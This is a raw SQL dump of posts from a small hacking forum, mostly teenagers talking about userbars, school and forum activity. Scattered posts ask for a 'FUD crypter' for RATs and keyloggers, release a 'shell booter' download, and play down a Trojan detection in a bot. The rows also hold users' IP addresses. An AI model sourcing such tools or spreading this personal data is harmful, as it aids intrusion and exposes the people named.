'0', '0', '1', 'a45cec25d71c550965aa3cc6a6a1379f', '0', '0'); INSERT INTO mybb_posts VALUES('2063', '433', '2008', '61', 'RE: eBooks Giveaway', '0', '82', 'iTzIpod', '1347717539', '[quote=\'p420\' pid=\'2008\' dateline=\'1347677433\']\r\n[quote=\'iTzIpod\' pid=\'1980\' dateline=\'1347664544\']\r\n[quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\']\r\nWhy not take a screenshot of some of them?\r\n[/quote]\r\n\r\nI don\'t own them.\r\n[/quote]\r\n\r\nI\'m sure Jok3r meant to take a screenshot of your giveaway folder.\r\n[/quote]\r\n\r\nI just said I don\'t own them? :o\r\nIt\'s not my file. But it\'s safe. I can guarantee you that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0cef59d3f44c52fc2278f235cc56978', '0', '0'); INSERT INTO mybb_posts VALUES('2064', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '82', 'iTzIpod', '1347717708', 'Do you want me to do a vouch copy? If so PM me.\n\nOther than that, Good luck with sales', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d849385f1147947a757c7fcfc71ba59', '0', '0'); INSERT INTO mybb_posts VALUES('2065', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1347717769', 'Added some programs and methods to the Upgrade Section.\n\nGood luck/Enjoy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48692932ae2fbdb3846af193a9dafb79', '0', '0'); INSERT INTO mybb_posts VALUES('2066', '38', '2041', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347717832', '[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\']\r\nI have that Book. Kevin Mitnick The Art of Deception.\r\n[/quote]\r\n\r\nOh ok.\r\nI\'ll see if I can read it online.\r\n\r\nAnd then I will try this at school :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e94ed68a4e27d27ff2a0819e0f5d9647', '0', '0'); INSERT INTO mybb_posts VALUES('2067', '345', '1983', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347717879', '[quote=\'NXK\' pid=\'1983\' dateline=\'1347665593\']\r\nI don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things.\r\n[/quote]\r\n\r\nStill looking for that Font name..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26ef513872fced9fb56c76ae2cdf91ba', '0', '0'); INSERT INTO mybb_posts VALUES('2068', '385', '2043', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347718144', '[quote=\'R?????zo?\' pid=\'2043\' dateline=\'1347703732\']\nI don\'t want you to leave either, you are a really good member in my opinion, I\'ve read somewhere that you are busy with school but you should stick here, school comes first of course but even if your not active everyday , I\'m sure you can find time to leave a post or two sometime. And now that we just become friendly :P I don\'t want you to leave.\nWell it\'s your call anyways, but good luck to whatever your decision is :)\n[/quote]\n\nAha thanks for those kind words <3 It literally almost made me tear up :/\n\nI will try to be active on weekends. But I can\'t guarantee it because I get a lot of assignments and projects..', '24.212.197.164', '416597412', '1', '0', '82', '1347718187', '1', '320e96424def238f94355bbc8152bffe', '0', '1347718187'); INSERT INTO mybb_posts VALUES('2069', '422', '2042', '19', 'RE: [Read] Announcement', '0', '82', 'iTzIpod', '1347718216', '[quote=\'R?????zo?\' pid=\'2042\' dateline=\'1347702452\']\r\nThanks for doing this giveaways, it should be one of the rules of this group to NOT share anywhere else outside the group.\r\n[/quote]\r\n\r\nAdded to the thread.\r\n\r\nThanks for the suggestion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ea66cb5dd64d3ce6072a4b66c14377b6', '0', '0'); INSERT INTO mybb_posts VALUES('2070', '447', '0', '7', '2000 Posts', '0', '82', 'iTzIpod', '1347718314', 'Congratulations L33t Hacking on 2000+ Posts.\r\nThis is a wonderful forum achievement! \r\n\r\nThank you everyone that has contributed to LH. And everyone that has posted. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99ad337eeae09d94adaa7bac3971a722', '0', '0'); INSERT INTO mybb_posts VALUES('2071', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '53', 'sirchamp', '1347718426', '[quote]5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\". [/quote]\nRead the rules Please', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '9f7a0159e98c3c17314bda636a573b2e', '0', '0'); INSERT INTO mybb_posts VALUES('2091', '437', '2090', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347741361', '[quote=\'t3h jok3r\' pid=\'2090\' dateline=\'1347737042\']\r\n[quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\']\r\n[quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\']\r\n[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\']\r\n[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\']\r\nWebsite Viewer? And fixed the link to L33THacking.net\r\n[/quote]\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p\r\n[/quote]\r\n\r\n\r\nI have no idea what you are talking about.\r\n[/quote]\r\n\r\nI meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o\r\nBut you changed it to L33thacking.net now so it doesn\'t matter.\r\n[/quote]\r\n\r\nOh OK, it\'s better to have it redirect to the new LH site because then we can even get more members.\r\n[/quote]\r\n\r\nDo you know an estimate on when that\'s gonna happen?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af53a2f91cf7ed0c0e1c56ccc8630905', '0', '0'); INSERT INTO mybb_posts VALUES('2076', '345', '2075', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347721186', '[quote=\'R?????zo?\' pid=\'2075\' dateline=\'1347720890\']\r\nMy attemps:\r\n\r\n[URL=http://imgur.com/Mul6K][IMG]http://i.imgur.com/Mul6K.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/fmK09][IMG]http://i.imgur.com/fmK09.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/ZX8Ku][IMG]http://i.imgur.com/ZX8Ku.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/xyMsA][IMG]http://i.imgur.com/xyMsA.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/uDY9P][IMG]http://i.imgur.com/uDY9P.png[/IMG][/URL]\r\n[/quote]\r\n\r\nIf you try using the font NXK used, it would all look great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7cb2ca5e75728f873c66e531fbf69b3', '0', '0'); INSERT INTO mybb_posts VALUES('2077', '345', '2039', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347724859', 'http://www.dafont.com/8bit-wonder.font\r\n\r\nThat\'s the font.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1033982987d5cd92a20440b2d8035369', '0', '0'); INSERT INTO mybb_posts VALUES('2078', '56', '140', '15', 'RE: Tubeonia [ Best Youtube Bot ]', '0', '100', '??zg???g????61', '1347725374', '<3 this is awesome thanks bro\n[hr]\nEr, could you post a direct download?', '65.96.215.138', '1096865674', '1', '0', '100', '1347725433', '1', 'c444efdf9237683b16f6ac6323646f45', '0', '0'); INSERT INTO mybb_posts VALUES('2079', '92', '220', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '100', '??zg???g????61', '1347725601', 'Awesome downloading now. Thanks\n[hr]\nDoesn\'t work </3 thanks anyway.', '65.96.215.138', '1096865674', '1', '0', '100', '1347725959', '1', '940700162cc0948eb6589fe6b3e22654', '0', '0'); INSERT INTO mybb_posts VALUES('2112', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347756651', 'Trojan? Can you explain why the virus results detected a Trojan?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cbe52a2ef332eb78cb3758138efb5b35', '0', '0'); INSERT INTO mybb_posts VALUES('2081', '345', '2077', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347729354', '[quote=\'NXK\' pid=\'2077\' dateline=\'1347724859\']\r\nhttp://www.dafont.com/8bit-wonder.font\r\n\r\nThat\'s the font.\r\n[/quote]\r\n\r\nThanks very much. I will make a userbar on once I am free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '23da77b114d88676df877ffff95cbb43', '0', '0'); INSERT INTO mybb_posts VALUES('2082', '385', '1768', '19', 'RE: Discussion', '0', '100', '??zg???g????61', '1347735593', 'DONT LEAVE BRAH DONT DO IT', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'baef1746071fdc16bcb9780850c22289', '0', '0'); INSERT INTO mybb_posts VALUES('2083', '448', '2073', '61', 'RE: Broken Links', '0', '1', 't3h jok3r', '1347736285', 'I have a quick question, why is this closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '45d3e10bb8b5a26af4478abe75992126', '0', '0'); INSERT INTO mybb_posts VALUES('2084', '447', '2070', '7', 'RE: 2000 Posts', '0', '1', 't3h jok3r', '1347736421', 'Yippeeeeee. Thanks a lot everyone. I highly appreciate it, the day we get 500 threads I will give out something for free to the whole community.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '191cb40709b0851e954198152f669c20', '0', '0'); INSERT INTO mybb_posts VALUES('2085', '38', '2066', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347736470', '[quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\']\r\n[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\']\r\nI have that Book. Kevin Mitnick The Art of Deception.\r\n[/quote]\r\n\r\nOh ok.\r\nI\'ll see if I can read it online.\r\n\r\nAnd then I will try this at school :3\r\n[/quote]\r\n\r\nYou can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'daf6c0137d272ff148c33f8034e0d5a8', '0', '0'); INSERT INTO mybb_posts VALUES('2086', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347736511', 'Sure, give me the doctors address and I will drag him in this section and also how much would the operation cost?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c640df470af66b5d815800027962e103', '0', '0'); INSERT INTO mybb_posts VALUES('2087', '436', '2060', '7', 'RE: Motivation', '0', '1', 't3h jok3r', '1347736540', '[quote=\'iTzIpod\' pid=\'2060\' dateline=\'1347717297\']\r\n[quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\']\r\nI think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home.\r\n[/quote]\r\n\r\nYeah. If only summer was 3 months, we could\'ve had our members active a little longer.\r\n[/quote]\r\nI have no idea what you meant by that.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a6b029d4d4e3582bfeb68798eeca6d89', '0', '0'); INSERT INTO mybb_posts VALUES('2088', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '1', 't3h jok3r', '1347736881', 'Starting price is $200 atm, I heard it\'s gonna be up to $400 when it gets released. I might pre-order this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3f5898d599d9df83c609bfd5cd8a9361', '0', '0'); INSERT INTO mybb_posts VALUES('2089', '431', '2044', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347736992', '[quote=\'R?????zo?\' pid=\'2044\' dateline=\'1347706600\']\r\n[quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\']\r\nSize: Dunno\r\nColour Scheme: Black, Red, Grey, Silver or white\r\nRender/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png\r\nText: Admin\r\nAnything else: This is going to be the admin userbar.\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/H8PtH.png[/img]\r\n\r\nHope you like it.\r\nLet me know if you need anything changed.\r\n\r\n[hr]\r\n[quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\']\r\n\r\n1. Thanks for contributing to Unique. =]\r\nBut I\'m fine for now. =]\r\n[/quote]\r\n\r\nHeres your request, hope you like it:\r\n\r\n[img]http://i.imgur.com/cEFV6.gif[/img]\r\n[/quote]\r\n\r\nThanks, I like the text but the icon doesn\'t look good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e9a4ff279a1caaef449ed6246f4d09d9', '0', '0'); INSERT INTO mybb_posts VALUES('2090', '437', '2046', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347737042', '[quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\']\r\n[quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\']\r\n[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\']\r\n[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\']\r\nWebsite Viewer? And fixed the link to L33THacking.net\r\n[/quote]\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p\r\n[/quote]\r\n\r\n\r\nI have no idea what you are talking about.\r\n[/quote]\r\n\r\nI meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o\r\nBut you changed it to L33thacking.net now so it doesn\'t matter.\r\n[/quote]\r\n\r\nOh OK, it\'s better to have it redirect to the new LH site because then we can even get more members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ad5d8af5e5df3070b65d4305462d549', '0', '0'); INSERT INTO mybb_posts VALUES('2092', '436', '2087', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347741423', '[quote=\'t3h jok3r\' pid=\'2087\' dateline=\'1347736540\']\r\n[quote=\'iTzIpod\' pid=\'2060\' dateline=\'1347717297\']\r\n[quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\']\r\nI think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home.\r\n[/quote]\r\n\r\nYeah. If only summer was 3 months, we could\'ve had our members active a little longer.\r\n[/quote]\r\nI have no idea what you meant by that.\r\n[/quote]\r\n\r\nIf our summer break was longer, we would\'ve had an opportunity to have more active members..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78365c1c27508f1691cbe4c058d876ea', '0', '0'); INSERT INTO mybb_posts VALUES('2093', '448', '2083', '61', 'RE: Broken Links', '0', '82', 'iTzIpod', '1347741724', '[quote=\'t3h jok3r\' pid=\'2083\' dateline=\'1347736285\']\r\nI have a quick question, why is this closed?\r\n[/quote]\r\n\r\nI closed it because I thought it was loud and clear for anyone to understand.. So if they see a broken link, then they will report it to me. And I will fix the link', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f71ef8ea325c3a05bd9df00dc8799b05', '0', '0'); INSERT INTO mybb_posts VALUES('2094', '446', '2086', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347742303', '[quote=\'t3h jok3r\' pid=\'2086\' dateline=\'1347736511\']\r\nSure, give me the doctors address and I will drag him in this section and also how much would the operation cost?\r\n[/quote]\r\n\r\nAha t3h jok3r, you\'re so funny... :roflol: \r\n\r\n\r\nNot :grrr:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '626ab6e0161611b71afa737d773c2c05', '0', '0'); INSERT INTO mybb_posts VALUES('2095', '56', '2078', '15', 'RE: Tubeonia [ Best Youtube Bot ]', '0', '82', 'iTzIpod', '1347742784', '[quote=\'GRONgamer61\' pid=\'2078\' dateline=\'1347725374\']\r\n<3 this is awesome thanks bro\r\n[hr]\r\nEr, could you post a direct download?\r\n[/quote]\r\n\r\nIsn\'t DepositFiles a direct download? O_o\r\n\r\nEDIT: Oh. The download link is broken..', '24.212.197.164', '416597412', '1', '0', '82', '1347742840', '1', '600c5702a444ff9b0bd1da4f28ca7aef', '0', '1347742840'); INSERT INTO mybb_posts VALUES('2096', '92', '2079', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '82', 'iTzIpod', '1347742927', '[quote=\'GRONgamer61\' pid=\'2079\' dateline=\'1347725601\']\r\nAwesome downloading now. Thanks\r\n[hr]\r\nDoesn\'t work </3 thanks anyway.\r\n[/quote]\r\n\r\nWhat do you mean it doesn\'t work?\r\n\r\nI just downloaded it.\r\n\r\nOr did you mean the file doesn\'t work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2e87c18af8b492a0549902c012a39990', '0', '0'); INSERT INTO mybb_posts VALUES('2097', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1347743128', 'Ughh. Keep on getting the 1 month XBL thing.. \nIt\'s just a text file saying that he needs to PM him about it or something -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dda0a93c228eac776407e142949a690', '0', '0'); INSERT INTO mybb_posts VALUES('2098', '38', '2085', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347743298', '[quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\']\r\n[quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\']\r\n[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\']\r\nI have that Book. Kevin Mitnick The Art of Deception.\r\n[/quote]\r\n\r\nOh ok.\r\nI\'ll see if I can read it online.\r\n\r\nAnd then I will try this at school :3\r\n[/quote]\r\n\r\nYou can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle.\r\n[/quote]\r\n\r\n\r\nI already read the book :o\r\n\r\n\r\nI think..\r\n\r\nIs this it?\r\n\r\nhttp://mitnicksecurity.com/media/CSC-Testimonial.pdf', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd40c96687e4d97e9421cfede37f7eed0', '0', '0'); INSERT INTO mybb_posts VALUES('2099', '385', '2082', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347743349', '[quote=\'GRONgamer61\' pid=\'2082\' dateline=\'1347735593\']\r\nDONT LEAVE BRAH DONT DO IT\r\n[/quote]\r\n\r\n:p Made me LOL.\r\nWhy? Can you explain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd279b17426bf769687853aa64cfaed1', '0', '0'); INSERT INTO mybb_posts VALUES('2100', '447', '2084', '7', 'RE: 2000 Posts', '0', '82', 'iTzIpod', '1347743409', '[quote=\'t3h jok3r\' pid=\'2084\' dateline=\'1347736421\']\r\nYippeeeeee. Thanks a lot everyone. I highly appreciate it, the day we get 500 threads I will give out something for free to the whole community.\r\n[/quote]\r\n\r\nI wonder what that is.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27fe7fbd3a6cca96332c30c88e7642db', '0', '0'); INSERT INTO mybb_posts VALUES('2101', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347743858', 'I know right?\nThat\'s really expensive...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '42c51493889e06fdb17ebada40dfd304', '0', '0'); INSERT INTO mybb_posts VALUES('2102', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347744004', 't3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking.\n\nOT: Thanks Reloadzor for making me this animated signature.\nThanks for changing the font too. <3\n\nVouch for legit and awesome and fast service <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f298731551bc89b892b8e193c0bb403', '0', '0'); INSERT INTO mybb_posts VALUES('2103', '431', '2102', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347745224', '[quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\']\r\nt3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking.\r\n\r\nOT: Thanks Reloadzor for making me this animated signature.\r\nThanks for changing the font too. <3\r\n\r\nVouch for legit and awesome and fast service <3\r\n[/quote]\r\n\r\nYeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '4c65bd5048d930130dc973bf2bcad3cb', '0', '0'); INSERT INTO mybb_posts VALUES('2104', '446', '2058', '28', 'RE: This forum is dead..', '0', '55', 'Baws', '1347747814', 'Well you need more active members, it can\'t be just iTzIpod and t3h jok3r', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '307f5b11ef72c4cc4c28f18baf9b9d4f', '0', '0'); INSERT INTO mybb_posts VALUES('2105', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347748250', 'Baws, be active then. Or atleast, try. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0356458ffd8db0e776c83cdb78ec6bf0', '0', '0'); INSERT INTO mybb_posts VALUES('2106', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347748611', 'I agree with Baws and he had some work to do @ iTzIpod.\n\nHe was the first active member on LH.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', 'b5f306928286c7d8d7ac3e05b148fbf7', '0', '0'); INSERT INTO mybb_posts VALUES('2107', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '5', 'Timmy', '1347748728', 'Thanks for the direct download links.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '42b7ce347f5ed4aa18bca5496b334e84', '0', '0'); INSERT INTO mybb_posts VALUES('2108', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '5', 'Timmy', '1347748778', 'Is it auto and can you fix the codes?', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '664a7ab4c04fcbd6c89cc15ffb2d6805', '0', '0'); INSERT INTO mybb_posts VALUES('2109', '446', '2105', '28', 'RE: This forum is dead..', '0', '55', 'Baws', '1347749164', '[quote=\'iTzIpod\' pid=\'2105\' dateline=\'1347748250\']\r\nBaws, be active then. Or atleast, try. =]\r\n[/quote]\r\n\r\nI\'m trying right now right?\r\n\r\nBut just 3 members won\'t do it.\r\n\r\nJust so you know, you\'re in 8th grade, I\'m in 11th.\r\n\r\nYou have no idea how much I have, first week of school and we gotta essay already.\r\n\r\nThey give us articles and a prompt, that\'s it, then you gotta do the essay.\r\n\r\nNot that easy.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '79e7c64f030522f1f4f25f0e87a1c3d4', '0', '0'); INSERT INTO mybb_posts VALUES('2110', '450', '0', '20', 'Anyone got a good crypter?', '0', '5', 'Timmy', '1347749482', 'I need a FUD crypter for RATs or Keyloggers', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '359dadedf9db2d0ca2879d80672d6984', '0', '0'); INSERT INTO mybb_posts VALUES('2111', '451', '0', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '5', 'Timmy', '1347749580', 'fuck hell, releasing password now: haxed\n[align=center]------------------------------------------------[/align]\n[align=center][b]LINKS:[/b][/align]\n[align=center][url=http://www.2shared.com/file/dL7LMgiP/ShellBooter.html]Download the ShellBooter from here.[/url][/align]\n[align=center][url=https://www.virustotal.com/file/067b3d41f5e4f27592fb186f5038d13721a1270a89f6b106ffcfb9b3bc7696dc/analysis/1345721125/]Click here for see virusTotal[/url][/align]', '72.231.24.165', '1223104677', '1', '0', '5', '1347749609', '1', 'aba4ebebb2a8adb6396c99bb59237345', '0', '1347749609'); INSERT INTO mybb_posts VALUES('2113', '38', '2098', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347757194', '[quote=\'iTzIpod\' pid=\'2098\' dateline=\'1347743298\']\r\n[quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\']\r\n[quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\']\r\n[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\']\r\nI have that Book. Kevin Mitnick The Art of Deception.\r\n[/quote]\r\n\r\nOh ok.\r\nI\'ll see if I can read it online.\r\n\r\nAnd then I will try this at school :3\r\n[/quote]\r\n\r\nYou can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle.\r\n[/quote]\r\n\r\n\r\nI already read the book :o\r\n\r\n\r\nI think..\r\n\r\nIs this it?\r\n\r\nhttp://mitnicksecurity.com/media/CSC-Testimonial.pdf\r\n[/quote]\r\n\r\n\r\nNo. A book can\'t consist of 2 pages, the book is like 200 pages long.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8fc228337027523d02ac3a120e84f400', '0', '0'); INSERT INTO mybb_posts VALUES('2114', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1347757551', 'Please include your userbar, ficon and if can then a logo or signature of the Unique Group.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '216a8968b9b244260dde989ef497606a', '0', '0'); INSERT INTO mybb_posts VALUES('2296', '441', '2295', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347939716', '[quote=\'t3h jok3r\' pid=\'2295\' dateline=\'1347938985\']\r\n[quote=\'iTzIpod\' pid=\'2115\' dateline=\'1347765139\']\r\n[quote=\'t3h jok3r\' pid=\'2112\' dateline=\'1347756651\']\r\nTrojan? Can you explain why the virus results detected a Trojan?\r\n[/quote]\r\n\r\nIt\'s a fake\r\n[/quote]\r\n\r\nIt\'s a fake what?\r\n[/quote]\r\n\r\nIt\'s a fake/false report.\r\nAlso, just run it in Sandboxie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24b66a3734299e3253d3c4655938bf90', '0', '0'); INSERT INTO mybb_posts VALUES('2116', '38', '2113', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347765694', '[quote=\'t3h jok3r\' pid=\'2113\' dateline=\'1347757194\']\r\n[quote=\'iTzIpod\' pid=\'2098\' dateline=\'1347743298\']\r\n[quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\']\r\n[quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\']\r\n[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\']\r\nI have that Book. Kevin Mitnick The Art of Deception.\r\n[/quote]\r\n\r\nOh ok.\r\nI\'ll see if I can read it online.\r\n\r\nAnd then I will try this at school :3\r\n[/quote]\r\n\r\nYou can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle.\r\n[/quote]\r\n\r\n\r\nI already read the book :o\r\n\r\n\r\nI think..\r\n\r\nIs this it?\r\n\r\nhttp://mitnicksecurity.com/media/CSC-Testimonial.pdf\r\n[/quote]\r\n\r\n\r\nNo. A book can\'t consist of 2 pages, the book is like 200 pages long.\r\n[/quote]\r\nA book that consists of 2 pages is an awesome book.\r\nA book with 200 pages. Meg. I don\'t like reading a lot.. :/\r\n\r\nI\'ll pass on the book', '50.101.171.181', '845523893', '1', '0', '0', '0', '1', 'a7902755a96dc9e06175885ed9f70c92', '0', '0'); INSERT INTO mybb_posts VALUES('2117', '450', '2110', '20', 'RE: Anyone got a good crypter?', '0', '62', 'R?????zo?', '1347778564', 'Im in need of one too, for rat mostly', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5ba15325a547de420796716f25aca53b', '0', '0'); INSERT INTO mybb_posts VALUES('2118', '431', '2103', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347778640', '[quote=\'t3h jok3r\' pid=\'2103\' dateline=\'1347745224\']\r\n[quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\']\r\nt3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking.\r\n\r\nOT: Thanks Reloadzor for making me this animated signature.\r\nThanks for changing the font too. <3\r\n\r\nVouch for legit and awesome and fast service <3\r\n[/quote]\r\n\r\nYeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste.\r\n[/quote]\r\n\r\nif you liked the font I will post like 3-5 versions with different icons when I got the time later. you will pick the best :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5ce20df4174a5ca3a8c8d035cca5c25c', '0', '0'); INSERT INTO mybb_posts VALUES('2119', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '172', 'MistaCode', '1347791291', 'Looks good! My rating would be 10/10 ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '935b3fd91197dbae40ed7e410ef680a2', '0', '0'); INSERT INTO mybb_posts VALUES('2120', '370', '1874', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347791339', '[quote=\'R?????zo?\' pid=\'1874\' dateline=\'1347548689\']\r\n[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\']\r\nJust saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.\r\n[/quote]\r\n\r\nif you looking for a logo I can try and make something fancy?\r\n[/quote]\r\n\r\nNo, im not looking for logo :D im just making an logo ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '75dacdb2a6b435c3ec6e19cd9de13aad', '0', '0'); INSERT INTO mybb_posts VALUES('2121', '452', '0', '29', '[EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347792841', '[align=center][img]http://www.livingondividends.com/wp-content/uploads/2009/09/hersheys-text-based-logo.png[/img]\r\n\r\n[size=medium]In this eBook I will show you how to get $20+ in check form from Hershey\'s. I have done this quite a few times, and have maxed out $60. All of the money will come in check form. No coupons, no CompanyCash, 100% Real 